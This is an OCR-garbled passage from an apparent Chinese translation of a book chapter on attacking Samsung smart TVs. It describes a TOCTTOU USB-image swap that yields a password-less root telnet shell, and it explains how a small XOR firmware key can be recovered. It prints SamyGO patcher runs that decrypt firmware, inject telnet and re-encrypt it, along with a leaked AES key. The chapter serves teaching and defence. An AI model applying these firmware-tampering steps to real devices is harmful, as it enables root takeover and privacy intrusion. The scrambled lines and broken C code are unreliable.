15 TOCTTOU.SO -» read completed! 


16 CLMETA.DAT (471b) [/TOCTTOU] 
17 CLMETA.DAT -> read completed! 


Gumstix 板 第 一 次 插入 到 电视 中 时 ，g _file_storage.ko 从 “B” 了 映像 中 提取 文件 。 电 视 读 取 clmeta.dat 文 件 ， 确 保 应 用 类 型 不 是 Game。 注 意 Cache 应 用 程序 的 clmeta.dat 
文件 的 大 小 约 为 270MB， 填 满 了 电视 中 的 缓存 空间 。 这 就 会 促使 电视 重读 Gumstix 板 中 的 缓存 文件 。 这 时 ，9g _file_storage.ko 切 换 到 映像 M (第 6 行 的 设备 切换 (device 
switched) ! ) 。 这 时 由 于 没有 Game 类 型 的 应 用 程序 ， 因 而 允许 用 户 选择 程序 进行 安装 。 用 户 选 择 TOCTTOU 程 序 ， 电 视 复制 TOCTTOU 目 录 中 的 所 有 文件 到 本 地 存储 器 


中 ， 包 括 Telnet 服 务 二 进 制 文件 (telnetd) 。 


注意 ， 在 第 16 行 ， 电 视 重 读 了 clmeta.dat 文 件 ， 该 文件 运行 在 映像 M 中 ， 类 型 是 Game。 由 于 电视 在 引 
过 exeDSP 以 root 权 限 执行 。 


EIS SÉ 


E 类 型 ， 因 而 应 用 程序 被 复制 到 本 地 存储 中 ， 并 通 


通过 这 种 方法 ， 研 究 人 员 就 可 以 欺骗 电视 ， 使 用 最 高 的 权限 运行 一 个 共享 库 应 用 程序 了 。 本 例 中 ， 使 用 tocttou.so 中 的 Game_Main 函 数 调用 telnetd 二 进 制 文件 。 假 定 该 
二 进 制 文件 被 修改 过 了 ， 不 要 求 提供 密码 。 攻 击 者 可 以 使 用 这 一 方法 登录 到 电视 上 (使 用 Telnet 客 户 端 ) ， 不 需要 输入 密码 直接 就 可 以 获取 一 个 root 权 限 的 shell 了 。 


这 是 一 个 针对 市 场 上 流行 的 智能 电视 ， 绕 过 其 访问 限制 和 安全 功能 实施 攻击 的 一 个 很 好 的 例子 。 即 使 攻击 需要 实际 访问 


简单 的 漏洞 : 电视 并 不 会 在 重读 clImeta.data 文 件 时 ， 检 查 应 用 的 类 型 。 


由 于 智能 电视 需要 物理 访问 ， 因 而 我 们 不 能 低估 攻击 的 可 能 性 。 通 过 社会 工程 学 攻击 ， 家 庭 确 实 会 成 为 攻击 的 目标 。 可 
过 的 电路 板 (如 Gumstix) 邮寄 给 用 户 。 由 于 智能 电视 含有 摄像 头 设备 (或 者 允许 插入 第 三 方 的 摄像 机 ) 支持 视频 通话 ， 因 


庭 网 络 中 ， 可 能 会 导致 受害 者 隐私 泄露 。 


电视 ， 这 仍然 是 很 有 意思 的 ， 因 为 它 利 用 了 一 个 很 


以 采用 这 种 方式 ， 假 冒 商家 进行 官方 更 新 ， 将 修改 
而 如 果 智 能 电视 被 攻陷 ， 并 被 进一步 利用 攻 入 到 家 


针对 这 种 攻击 的 对 策 很 简单 。 首 先 需 要 检查 复制 到 本 地 存储 的 任何 第 三 方 应 用 程序 的 类 型 。 如 果 类 型 检查 失败 ， 电 视 可 以 拒绝 安装 应 用 程序 。 对 于 其 他 物 联网 设备 ， 可 以 
允许 用 户 只 安装 某 一 特定 类 型 的 应 用 程序 。 这 样 就 可 以 确保 物 联网 设备 用 户 隐私 的 安全 性 ， 免 遭 TOCTTOU 这 类 简单 攻击 的 影响 。 


5.2” 那 也 叫 加 密 吗 


当前 密码 学 领域 还 处 于 繁荣 发 展 阶段 。 加 密 算 法 和 计算 能 力 的 提升 会 帮助 保护 软件 及 硬件 数据 的 完整 性 。 物 联网 设备 现在 和 将 来 都 会 持续 不 断 地 借助 于 加 密 来 保护 用 户 隐 


私 ， 保 护 其 自身 的 完整 性 不 被 破坏 。 对 于 评估 远程 安全 设计 ， 加 密 算 法 是 一 个 很 好 的 工具 ， 但 是 最 根本 的 是 架构 师 和 开发 人 员 必 须要 对 算法 工作 的 机 制 有 一 个 很 恰当 的 理解 ， 


这 样 才能 设计 出 安全 的 产品 。 缺 乏 对 加 密 算法 的 综合 理解 可 能 会 导致 终端 产品 产生 漏洞 而 遭受 攻击 。 


本 节 ， 我 们 来 看 看 由 于 缺乏 对 加 密 算法 的 基本 理解 ， 导 致 三 星 智能 电视 出 现 可 利用 的 漏洞 ， 实 施 本 地 攻击 (物理 访问 所 必须 的 ) ， 人 允许 用 户 修改 电视 固件 。 这 种 攻击 利用 
了 XOR 加 密 程序 的 漏洞 ， 产 生 的 后 果 与 TOCTTOU 很 相似 。 我 们 来 快速 地 回顾 一 下 XOR 算 法 (https;//en.wikipedia.org/wiki/XOR cipher) ， 并 分 析 攻 击 的 方法 。 


5.2.1 理解 XOR 


XOR ( 异 或 ， 也 可 表示 “XOR 加 密 ”) 是 一 个 布尔 代数 函数 。 其 计算 非常 简单 ， 如 果 两 个 操作 数 有 且 只 有 一 个 是 true， 则 计算 结果 是 true。 基 于 这 一 逻辑 ， 如 下 表 所 示 : 


1 XOR 1 is 0 
1 XOR 0 is 1 
0 XOR 1 is 1 
0 XOR 0 is 0 


我 们 编写 一 个 简单 的 C 程 序 ， 将 字 串 cat 与 key 值 KEY 进 行 异 或 : 


finclude <stdio.h> 
intmain() 


char string[4]-"cat"; 
char key[4]-"KEY"; 


for(intx-0; x«3; x++) 
string[x]-string[x]^key[x]; 


printf ("$c",string[x]); 


) 
printf ("Nn"); 


return 


注意 在 C 语 言 里 ，^ 表 示 异 或 操作 。 现 在 编译 程序 : 


$ gccxor.c -o xor 


看 看 计算 结果 : 


$ ./xor 


($- 


cat 和 KEY 异 或 的 结果 是 ($-。 这 是 因为 程序 将 c 与 K 异 或 ，a 与 E 异 或 ，t 与 Y 异 或 。 我 们 分 析 一 下 c 与 K 异 或 。c 的 ASCII 码 值 是 99， 转 换 成 二 进 制 是 01100011。K 的 ASCIl 码 
值 是 75， 转 换 成 二 进 制 是 01001011， 将 这 两 个 值 异 或 : 
01100011 


(XOR) 01001011 


计算 的 二 进 制 结果 是 00101000。 十 进 制 是 40， 对 应 的 ASCIl 值 是 (。 这 也 就 解释 了 为 什么 我 们 的 程序 输出 是 ($-。 (有 时 间 可 以 试 试 其 他 两 个 字符 的 计算 ,计算 的 结果 会 
是 $ 和 -。) 


在 这 个 例子 中 ， 加 密 密 钥 是 KEY， 明 文 数据 是 单词 cat， 加 密 后 的 密 文 是 ($-， 持 有 密 钥 的 人 如 果 知 道 了 密 文 ， 就 可 以 对 其 进行 解密 ,将 ($- 还 原 成 cat。 我 们 来 验证 一 
F: 


#include <stdio.h> 


int main () 

{ 
char string[4]=" ($-"; 
char key[4]-"KEY"; 


for(int x-0; x«3; x++) 
{ 
string[x]-string[x]^key[x]; 


printf ("$c",string[x]); 
} 


printf ("Nn"); 
return 


$ gcc xor2.c -o xor2 
$ ./xor2 
cat 


这 只 是 对 XOR 工 作 原理 一 个 简单 的 描述 。 当 然 ， 在 这 个 例子 中 ， 密 铀 和 明文 是 等 长 的 ， 因 而 简单 易 懂 。 在 真实 的 世界 中 ， 长 密 钥 是 很 重要 的 ， 否 则 黑客 借助 暴力 破解 就 能 
很 容易 地 猜 出 密 钥 。 如 果 数 据 比 密 钥 的 长 度 要 长 ， 密 钥 就 必须 不 断 重 复 以 匹配 明文 。 当 使 用 一 次 性 密 钥 (比如 密 钥 不 用 重复 使 用 ， 并 且 长 度 大 于 或 等 于 明文 的 长 度 ) 的 时 
候 ，XOR 是 一 个 很 强壮 的 算法 。 


52.2 ”这 才 是 加 密 


三 星 允 许 用 户 将 固件 程序 保存 至 USB 设 备 中 ， 插 入 智能 电视 执行 升级 来 下 载 固 件 。 接 下 来 我 们 下 载 一 个 PN58B860Y2F 模 块 的 固件 。 在 这 个 例子 里 ， 我 们 会 分 析 一 下 2009 
年 9 月 22 日 出 现 的 一 个 固件 升级 问题 (1013 版 ， 见 图 5-2) 。 


] www.samsung Com/us/supportjowners/productPN58B860Y2F © 
Mg i g 


lome > Support» 


TVs 


PNSBB860Y2F wwe 2| [e] 37 Piatt 
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Request Service Email Support 
Track Service " 
Find Service Near You (7 Call 1-388-987-4357 


Mobile Phone LCD and Qut of 
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FAQs & How-Tos Community Q&A 


Software | Firmware Operating System: — ^i Language: — Ali 
Description a Release Date Language Size (MB) 


Upgrade File (Firmware) (ver.15013) Tue Sep 22 01:35:00 ENGLISH 
pg 
EDT 2009 


© Upgrade guido (Firmware) (vor.1.0) Sun Sep 06 19:48:00 ENGLISH 
EDT 2009 


185-2: 三 星 的 固件 升级 下 载 网 站 


即使 固件 升级 文件 采用 的 是 Windows 的 .exe 可 执行 文件 格式 ， 网 站 上 提供 的 也 还 是 ZIP 文 件 ， 需 要 使 用 unzip 工 具 解 压缩 : 


$ unzip 2009 DTV 2G firmware.exe 
Archive: 2009 DIV 2G firmware.exe 
inflating: T-CHE7AUSC/crc 
inflating: T-CHE7AUSC/ddcmp 
creating: T-CHE7AUSC/image/ 
inflating: T-CHE7AUSC/image/appdata.img.enc 
inflating: T-CHE7AUSC/image/exe.img.enc 
extracting: T-CHE7AUSC/image/info.txt 
inflating: T-CHE7AUSC/image/validinfo.txt 
inflating: T-CHE7AUSC/image/version info.txt 
inflating: T-CHE7AUSC/MicomCtrl 
inflating: T-CHE7AUSC/run.sh.enc 


如 上 所 示 ， 最 重要 的 两 个 固件 映像 文件 是 T-CHE7AUSC/image/appdata.img.enc 和 T-CHE7AUSC/imagey/exe.img.enc。 我 们 来 看 看 在 使 用 字符 串 工具 检查 这 些 文件 时 
会 发 生 什么 ， 字 串 工具 常用 来 输出 二 进 制 文件 的 可 输出 部 分 : 


$ strings T-CHE7AUSC/image/exe.img.enc 

ct-KLG7CUQC, 

KHM7QUSCT-CHE7AUZz'r 

ausct 

dect 
CHE7AUSCT-CHE7AUSCT-CHE7AUSCT-CHE7AUSCT-CHE7AUSCT-CHE7AUSCTCHE7AUSCT- 
CHE7AUSCT-CHE7AUSCT-CHE7AUSCT-CHE7AUSCT-CHE7AUSCTCHE7AUSCT- 
CHE7AUSCT-CHE7AUSCT-CHE7AUSCT-CHE7AUSCT-CHE7AUSCTCHE7AUSCT- 
CHE7AUSCT-CHE7AUSCT-CHE7AUSCT-CHE7AUSCT-CHE7AUSCTCHE7AUSCT- 
CHE7AUSCT-CHE7AUSCT-CHE7AUSCT-CHE7AUSCT-CHE7AUSCTCHE7AUSCT- 
CHE7AUSCT-CHE7AUSCT-CHE7AUSCT-CHE7AUSCT-CHE7AUSCTCHE7AUSCT- 
CHE7AUSCT-CHE7AUSCT-CHE7AUSCT-CHE7AUSCT-CHE7AUSCTCHE7AUSCT- 
CHE7AUSCT-CHE7AUSC-CHE7AUSC 

[rest of output removed for brevity] 


在 一 个 加 密 文 件 中 ， 重 复出 现 字符 串 T-CHE7AUSC 难 道 不 是 一 件 很 有 趣 的 事情 吗 ” 特 别 要 注意 的 是 ， 这 也 是 根 目 录 下 的 一 个 文件 ， 固 件 下 载 解压 缩 之 后 直接 创建 在 根 目录 
中 了 。 如 果 映 像 文 件 确实 被 加 密 了 ， 字 符 串 就 不 应 该 以 明文 显示 。 接 下 来 呢 ? 我 们 花 点 时 间 思 考 一 下 当 字 符 与 十 进 制 值 为 0 的 null 字 符 进 行 异 或 操作 时 会 发 生 什 么 。null 字 符 串 
常用 来 表示 内 存 中 字 串 的 结尾 ， 一 般 以 转移 序列 \0 表 示 。 


如 下 的 C 程 序 对 一 个 字符 和 null 字 符 执行 XOR 操 作 : 


finclude <stdio.h> 
intmain () 
printf("$cWMn",'a' ^ 'N0!'); 


return 1; 


} 


编译 程序 运行 一 下 ， 看 看 结果 : 


$ gccxor null.c -o xor null 
$ ./xor null 
a 


我 们 看 到 ， 使 用 null 字 符 进 行 异 或 计算 的 结果 还 是 原来 的 字符 。 也 就 是 说 ， 如 果 XOR 的 密 钥 很 小 而 且 进 行 XOR 计 算 的 字符 串 中 包含 一 系列 的 null 字 符 ， 那 么 在 密 文 中 会 显 


示 密 钥 的 内 容 ! 这 在 三 星 固件 文件 中 实 实 在 在 地 发 生 了 ， 正 如 我 们 刚才 使 用 strings 指 令 时 看 到 的 那样 。 三 星 犯 了 个 错误 ， 它 使 用 了 一 个 很 小 的 密 钥 ， 没 有 注意 到 被 加 密 映像 文 
件 包 含 了 大 量 的 null 字 符 (在 二 进 制 文件 中 这 是 很 常见 的 ) 。 三 星 不 仅 犯 了 这 个 错误 ， 甚 至 固件 根 目 录 的 名 称 跟 key 也 是 一 样 的 。 


这 样 做 的 后 果 就 是 : 任何 人 都 可 以 使 用 曝光 了 的 密 钥 解密 固件 、 修 改 固件 ， 然 后 在 使 用 相同 的 密 钥 加密 固 件 。 这 就 绕 过 了 三 星 旨 在 阻止 用 户 及 外 部 人 员 修补 电视 的 功能 ， 


没有 达到 应 用 程序 版 权 和 数字 版 权 控 制 的 目的 。 


在 SamyGO 网 站 和 论坛 上 ， 三 星 电视 的 用 户 发 表 了 很 多 的 意见 和 言论 ， 想 要 修改 电视 ， 但 这 是 三 星 不 希望 看 到 的 。SamyGO 有 一 个 很 流行 的 工具 (SamyGO Firmware 


Patcher) 正 是 利用 了 我 们 刚才 讨论 到 的 XOR 漏 洞 。 该 工具 可 以 利用 Telnet， 使 得 用 户 能 够 远程 登录 电视 获取 Linux 的 命令 提示 符 ， 因 而 也 可 以 进一步 修改 电视 功能 。 要 运行 该 
工具 ， 需 要 下 载 我 们 刚才 提 到 的 一 个 固件 ， 然 后 设置 固件 的 本 地 路 径 : 


$ python ./SamyGO.py -/Downloads/T-CHE7AUSC 
SamyGO Firmware Patcher v0.16 Beta (c) 2010 Erdem U. Altinyurt 


--BIG FAT WARNING!-- 
You can brick your TV with this tool! 
Authors accept no responsibility about ANY DAMAGE on your devices! 
project home: http://SamyGO.sourceforge.net 


XOR Encrytped CI firmware detected. 
Decrypting with XOR key : T-CHE7AUSC 
Crypto package found, using fast XOR engine. 


Applying VideoAR Patchhttp://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16123/OEBPS/Text/... 
MD5 of Decrypted image is : 9b4dl11ddc6bd41156573ae61d1660fdf u 

FAT image analyzed - exeDSP location: 7811072 size: 37414044 

ARM ELF exeDSP File Detected 

CToolMmbDisplaySizeltem::GetToolltem() Adress : 0x13537D0 

CToolMmbDisplaySizeltem::PressLeftRightKey() Adress : 0x1353AC8 

VideoAR Fix v1 Compatibility Found. 

VideoAR Fix v1 Patched on image. 


Applying Telnet Patchhttp://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16123/OEBPS/Text/... 
Searching $3 

Suitable Location Found for Script injection on Offset : 3969567 

Enable Telnet or Advanced Mode on image( T/a )? 

Patching Filehttp://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16123/OEBPS/Text/... 

Telnet Enabled on image. 

Calculatin new CRC : d71d7f17 

Updating /SamyGO/T-CHL7DEUC/image/validinfo.txt with new CRC. 


Encrypting with XOR : T-CHE7AUSC 

Crypto package found, using fast XOR engine. 
Operation successfully completed. 

Now you can flash your TV with ./T-CHL7DEUC directory. 


注意 ，SamyGO.py 工 具 正 是 使 用 我 们 发 现 的 strings 指 令 (T-CHE7AUSC) 作为 密 钥 对 “加 密 的 ”影像 文件 进行 解密 的 。 然 后 该 工具 会 修改 固件 ， 使 其 包含 Telnet 服 务 ， 


再 使 用 相同 的 XOR 密 钥 进 行 加 密 。 现 在 ， 用 户 需 要 将 T-CHE7AUSC 目 录 和 相关 内 容 存储 到 U 盘 上 ， 再 接 入 电视 。 这 时 ， 电 视 会 检查 固件 升级 的 过 程 ， 这 就 会 触发 Telnet 功 能 。 
默认 执行 修补 的 用 户 名 是 root， 不 需要 密码 (如 图 5-3 所 示 ) 。 


SamyGO 网 站 提供 了 大 量 额外 的 、 本 章 没有 列举 的 实施 漏洞 攻击 的 工具 。 如 果 你 有 一 台 三 星 电视 ， 上 去 找 一 找 ， 看 看 对 哪个 工具 感 兴趣 ， 不 妨 试 一 下 。 


= wiki.samygo.tv/index.php?title 


| n 


Telnet Way 


Firstly you needed to enable telnet because "Advanced Mode" does not start telnet automatically. 
So Download SamyGO Telnet Enabler Program :? extract it to your USB Flash, then plug it to TV. 
Using the Content Library from Pup-Up menu, select USB, then under Game Menu, select and 
start SamyGO application once. TV will goes black than returns to menu. This will enable your 
TV's telnet once. Connect to your TV via telnet. If you use windows, you can use a command 
prompt or better PuTTY (€. *nix guys just use a console. 


telnet «Your TV's IP depending your configuration» 


The default username is root with no password. 


图 5-3: 不 需要 密码 就 可 以 登录 三 星 电 视 打 Telnet 补 丁 


考虑 一 下 三 星 未 能 理解 XOR 算 法 基本 原理 所 带 来 危害 的 严重 性 。 这 个 错误 导致 3amyGO 社 区 非常 热闹 ， 对 三 星 公司 的 利益 来 讲 ， 这 不 是 很 有 利 。SamyGO 论 坛 技术 水 平 


较 高 的 用 户 很 喜欢 利用 这 种 类 型 的 漏洞 ， 因 为 这 给 了 他 们 很 大 的 自由 度 来 修改 他 们 购买 的 设备 ， 让 他 们 感觉 到 自己 允许 定制 产品 。 然 而 从 三 星 的 角度 来 讲 ， 人 允许 用 户 调整 国 件 
可 能 会 导致 设备 故障 。 由 于 随意 修改 固件 允许 用 户 非法 保存 并 传播 受 保护 的 媒介 内 容 ， 因 而 三 星 也 要 考虑 到 还 有 一 些 与 内 容 提供 相关 的 法 律 因素 。 


SamyGO 社 区 涉及 安全 问题 时 ， 显 得 并 不 是 很 专业 。 如 图 5-3 所 示 ， 无 需 密码 或 者 使 用 弱 密码 (如 SamyGO) 就 可 以 打 补丁 增加 功能 。 不 仅 没 有 经 验 丰富 的 用 户 将 恶意 软 
件 传 到 他 们 使 用 的 电视 上 (通过 修补 固件 置 入 远程 监控 工具 ) ， 而 且 也 没 看 到 针对 与 三 星 电视 在 同一 个 网 络 上 的 其 他 设备 的 使 用 空 密码 或 samyGO 这 种 弱 密码 登录 恶意 软件 。 


我 们 研究 的 固件 最 新 的 更 新 时 间 是 2009 年 。 这 么 久 没 有 更 新 是 因为 没 和 人 想 要 对 电视 中 之 前 的 问题 进行 修复 。 如 果 三 星 想 解 决 这 个 问题 ， 那 么 补丁 必须 使 用 有 缺陷 的 XOR 
机 制 进行 加 密 ， 原 因 是 补丁 首先 要 适用 于 已 经 存在 于 市 面 上 的 电视 。 很 明显 ， 这 种 情况 下 用 户 是 可 以 对 补丁 进行 解密 和 分 析 的 。 即 使 三 星 找到 了 解决 问题 的 办 法 ， 不 使 用 有 问 
题 的 加 密 机 制 ， 操 作 上 也 是 不 可 行 的 ， 因 为 用 户 不 可 能 通过 几 个 简单 的 操作 就 更 新 最 新 的 补丁 ， 大 多 数 的 用 户 都 不 会 ， 他 们 首先 需要 能 够 修补 XOR 漏 洞 的 一 个 关键 补丁 ， 这 样 
电视 才能 理解 新 的 ， 加 密 机 制 用 于 保护 最 新 的 固件 文件 。 看 看 这 得 多 麻烦 啊 ! 


在 网 络 安全 界 ， 有 一 个 很 亲切 的 倡 语 叫 encraption (重点 是 crap) ， 表 示 糟 糕 的 加 密实 现 。 如 本 例 所 示 ， 本 节 的 标题 恰如其分 。 


5.3 ”理解 和 开发 应 用 程序 的 世界 


智能 电视 提供 类 似 Skype 这 种 流行 的 电视 会 议 的 应 用 程序 。 本 节 ， 我 们 将 深入 研究 电视 中 的 应 用 程序 ， 理 解 它们 的 工作 机 制 和 安全 机 制 。 未 来 ， 越 来 越 多 的 人 将 在 智能 电 
视 上 使 用 并 依赖 应 用 程序 ， 因 此 滥用 应 用 程序 的 潜在 危险 变 得 越 来 越 高 。 这 是 因为 应 用 程序 越 多 ， 在 电视 上 运行 的 代码 也 必然 会 越 多 ， 代 码 中 可 能 就 包含 安全 漏洞 。 应 用 程序 
的 普及 也 会 吸引 恶意 攻击 者 ， 他 们 对 探索 供给 系统 偷 取 数据 的 途径 非常 感 兴 趣 。 


5.3.1 ”固件 解密 


为 了 深入 理解 应 用 程序 的 工作 方式 ， 我 们 需要 熟悉 支持 智能 电视 功能 的 基础 平台 。 我 们 已 经 讨论 了 应 用 在 智能 电视 上 的 弱 XOR 加 密 机 制 ， 这 种 机 制 允 许 用 户 解密 并 修改 因 
件 。 在 新 型 号 的 智能 电视 上 ， 三 星 已 经 采用 AES 加 密 算法 解决 了 这 一 问题 。 然 而 ， 加 密 密 钥 却 被 泄露 给 公众 了 。 目 前 还 不 清楚 这 是 怎么 发 生 的 ,但 是 SamyGO 网 站 的 工具 就 包 
含 了 这 一 密 钥 ， 而 且 很 容易 解密 从 三 星 网 站 上 下 载 的 固件 。 


先 看 一 个 我 们 已 知 使 用 AES 加 密 过 的 固件 版 本 : 

$ ls -l T-ECPDEUC/image/ 

total 197164 

-rw-rw-r-- apple apple 192794916 Apr 29 2013 exe.img.sec 
-rw-rw-r-- apple apple 132 Apr 29 2013 exe.img.sec.cmac 
-rw-rw-r-- apple apple 256 Apr 29 2013 exe.img.sec.cs 
-rw-rw-r-- apple apple 256 Apr 29 2013 exe.img.sec.vs 
-rw-rw-r-- apple apple 3272292 Apr 29 2013 Image.sec 
-rw-rw-r-- apple apple 132 Apr 29 2013 Image.sec.cmac 
-rw-rw-r-- apple apple 256 Apr 29 2013 Image.sec.cs 
-rw-rw-r-- apple apple 256 Apr 29 2013 Image.sec.vs 
-rw-rw-r-- apple apple 17 Apr 29 2013 info.txt 

-rw-rw-r-- apple apple 7 Apr 29 2013 major version 
-rw-rw-r-- apple apple 6 Apr 29 2013 minor version 
-rw-rw-r-- apple apple 5763492 Apr 29 2013 rootfs.img.sec 
-rw-rw-r-- apple apple 132 Apr 29 2013 rootfs.img.sec.cmac 
-rw-rw-r-- apple apple 256 Apr 29 2013 rootfs.img.sec.cs 
-rw-rw-r-- apple apple 256 Apr 29 2013 rootfs.img.sec.vs 
-rw-rw-r-- apple apple 65 Apr 29 2013 validinfo.txt 
-IW-rw-r-- apple apple 48 Apr 29 2013 version info.txt 


我 们 使 用 SamyGO Firmware Patcher 解 密 固件 ， 这 个 工具 已 经 内 嵌 了 泄露 了 的 加 密 密 钥 : 


$ ./SamyGO.py decrypt all ./T-ECPDEUC 
SamyGO Firmware Patcher v0.34 (c) 2010-2011 Erdem U. Altinyurt 


-=BIG FAT WARNING!-- 
You can brick your TV with this tool! 
Authors accept no responsibility about ANY DAMAGE on your devices! 
project home: http://www.SamyGO.tv 
Firmware: T-ECPDEUC v2008.2 


AES Encrytped CI+ firmware detected. 

Processing file Image.sec 

secret key : 3EF6067262CF0C678598BFF22169D1F1EA57C284 

Decrypting AEShttp://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16123/OEBPS/Text/... 
Decrypting with XOR Key : T-ECPDEUC 

Crypto package found, using fast XOR engine. 


Calculated CRC : OxEF4527E9 
CRC Validation passed 


Processing file rootfs.img.sec 

Secret key : 3EF6067262CF0C678598BFF22169D1F1EA57C284 

Decrypting AEShttp://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16123/OEBPS/Text/... 
Decrypting with XOR Key : T-ECPDEUC 

Crypto package found, using fast XOR engine. 


Calculated CRC : OxCF5DC1D2 
CRC Validation passed 


Processing file exe.img.sec 

secret key : 3EF6067262CF0C678598BFF22169D1F1EA57C284 

Decrypting AEShttp://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16123/OEBPS/Text/... 
Decrypting with XOR Key : T-ECPDEUC 

Crypto package found, using fast XOR engine. 


Calculated CRC : 0x109B6984 


CRC Validation passed 


运行 这 个 工具 之 后 ， 我 们 就 有 了 解密 版 本 的 映像 文件 (exe.imgfüroogfs.img) : 


$ ls -l T-ECPDEUC/image/ 
total 591372 


-rw-r--r-- apple apple 192794624 Dec 3 15:40 exe.img 
-rw-r--r-- apple apple 192794624 Dec 3 15:39 exe.img.enc 
cfW-rD--r-- apple apple 192794916 Apr 29 2013 exe.img.sec 
-rw-r--r-- apple apple 132 Apr 29 2013 exe.img.sec.cmac 
-rw-r--r-- apple apple 256 Apr 29 2013 exe.img.sec.cs 
EW apple apple 256 Apr 29 2013 exe.img.sec.vs 
—CÍW-r--r-—— apple apple 3272000 Dec 3 15:39 Image 

—CÍIW-r--Fr-— apple apple 3272000 Dec 3 15:39 Image.enc 
-rw-r--r-- apple apple 3272292 Apr 29 2013 Image.sec 
-rw-r--r-- apple apple 132 Apr 29 2013 Image.sec.cmac 
-rw-r--r-- apple apple 256 Apr 29 2013 Image.sec.cs 
-rw-r--r-- apple apple 256 Apr 29 2013 Image.sec.vs 
-—YW-r--r-- apple apple 17 Apr 29 2013 info.txt 
-rw-r--r-- apple apple 7 Apr 29 2013 major version 
-rw-r--r-- apple apple 6 Apr 29 2013 minor version 
TOÍW-P--r-—- apple apple 5763204 Dec 3 15:39 rootfs.img 
—IÍIW-I--r-—- apple apple 5763204 Dec 3 15:39 rootfs.img.enc 
-rw-r--r-- apple apple 5763492 Apr 29 2013 rootfs.img.sec 
-rw-r--r-- apple apple 132 Apr 29 2013 rootfs.img.sec.cmac 
-rw-r--r-- apple apple 256 Apr 29 2013 rootfs.img.sec.cs 
-rw-r--r-- apple apple 256 Apr 29 2013 rootfs.img.sec.vs 
-rw-r--r-- apple apple 65 Apr 29 2013 validinfo.txt 
-rw-r--r-- apple apple 48 Apr 29 2013 version info.txt 


5.3.2 “粗略 探讨 操作 系统 


现在 ， 我 们 来 看 看 支撑 三 星 流行 的 智能 电视 基础 平台 情况 。 我 们 已 经 获取 并 解密 了 固件 。 现 在 来 看 看 它 的 内 容 。 这 将 帮助 我 们 理解 三 星 电 视 是 如 何 架 构 的 。 反 过 来 这 也 会 
帮助 我 们 更 加 深入 地 理解 现存 的 攻击 向 量 。 另 外 ， 如 果 你 决定 做 更 深入 的 研究 ， 这 些 信息 也 肯定 会 对 你 有 所 帮助 。 


首先 ， 我 们 来 看 一 下 刚才 解密 的 映像 文件 ， 看 看 它 是 如 何 基于 Linux 平 台 设计 的 。 挂 载 rootfs.img: 


$ mount rootfs.img /media/rootfs.img/ -o loop 


在 文件 etc/profile 中 ， 我 们 发 现 如 下 分 区 : 


THHHHHHHHHHHHHE Partition Information IHHHHBHHHHHHHHE 
export MTD ONBOOT-/dev/mmcblk0pO 

export MTD UBOOT-/dev/mmcblk0pl 

export MID KERNEL 0-/dev/mmcblk0p2 

export MTD ROOTFS 0-/dev/mmcblk0p3 

export EX PARTITION-/dev/mmcblk0p4 

export MTD KERNEL 1-/dev/mmcblk0p5 

export MTD ROOTFS 1-/dev/mmcblk0p6 

export SECUREMACO-/dev/mmcblk0p7 

export SECUREMACI-/dev/mmcblk0p8 

export SECUREMAC2-/dev/mmcblk0p9 

export MTD DRMREGION A-/dev/mmcblkO0plO 

export MTD DRMREGION B-/dev/mmcblk0pll 

export MTD RWAREA-/dev/mmcblk0p12 

export MID EXE 0-/dev/mmcblk0p13 

export MTD EXE 1-/dev/mmcblk0p14 

export MTD ROCOMMON-/dev/mmcblk0pl5 

export MTD EMANUAL-/dev/mmcblk0pl6 

export MTD CONTENTS-/dev/mmcblk0pl7 

export MID SWU-/dev/mmcblk0p18 
export MTD RWCOMMON-/dev/mmcblk0p19 


一 共有 20 个 分 区 ， 单 一 系统 很 多 ， 多 数 以 只 读 模 式 挂 载 ， 有 效 限 制 了 攻击 向 量 。 


我 们 来 看 看 稍 早 提 到 的 exeDSP 可 执行 文件 ， 它 是 用 于 控制 电视 功能 的 主要 可 执行 文件 : 


$ ls -lh /media/exe.img/exeDSP 
-rwxr-xr-x 1 root root 146M Apr 28 2013 /media/exe.img/exeDSP 


注意 exeDSP 文 件 的 大 小 是 146MB， 这 是 一 个 非常 大 的 可 执行 文件 。 这 说 明 : 对 比 共享 库 或 共享 代码 来 讲 ， 这 个 文件 中 直接 就 包含 了 很 多 代码 ， 实 现 了 很 多 功能 。 在 映像 
文件 中 也 包含 了 其 他 的 共享 库 。 


有 证 据 证 明 电 视 使 用 X11Windows 系 统 显示 用 户 界 面 : 


/media/exe.img/Runtime/bin: 
total 7228 
drwxr-xr-x 
drwxr-xr-x 
-rWXr-xr-x 
-IWXrI-Xr-x 
-IWXrI-Xr-x 
-rWXr-xr-x 
-rWXr-xr-x 


root root 103 Apr 28 2013 . 

root root 152 Apr 28 2013 http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16123/OEBPS/Text/.. 
root root 4356171 Apr 28 2013 compiz 

root root 17237 Apr 28 2013 fc-cache 

root root 14044 Apr 28 2013 gdk-pixbuf-query-loaders 

root root 3010259 Apr 28 2013 X 

root root 2241 Apr 28 2013 xorg.conf 


PpPpPPPOND 


下 面 是 xorg.conf 文 件 的 一 个 片段 : 


Section "Screen" 


Identifier "Mali Screen" 


Device "Mali FBDEV" 

Monitor "Mali Monitor" 

DefaultDepth 24 

SubSection "Display" 

ViewPort 0 0 

Modes "1920x10806060" "1024x768" "1280x720" "960x540860" 

"960x540850" 
"720x576" "1920x720850d" "720x480" "960x1080050" 

"960x1080660" 


"1920x540060" "1920x540050" 
EndSubSection 
EndSection 


内 容 很 精确 ， 因 为 我 们 使 用 了 具有 高 清 功能 的 电视 (分 辨 率 是 1920x 1080) 作为 我 们 的 第 一 选择 。 其 他 分 辨 率 电视 其 实 也 可 以 。 


另外 一 个 我 们 要 粗略 了 解 的 有 趣 之 处 是 ， 底 层 系统 是 以 .cmk 文 件 呈 现 的 : 


$ ls -1 /media/exe.img/infolink/manager/*.cmk 

-r--r--r-- 1 root root 640 Apr 28 2013 /media/exe.img/infolink/manager/ 
config.xml.cmk 

-r--r--r-- 1 root root 11872 Apr 28 2013 /media/exe.img/infolink/manager/ 
index.html.cmk 


这 些 文件 都 是 “加 密 ” 过 的 ， 但 是 密 钥 已 经 被 泄露 了 ， 可 以 在 SamyGO 论 坛 上 找到 (如 图 5-4 所 示 ) . 


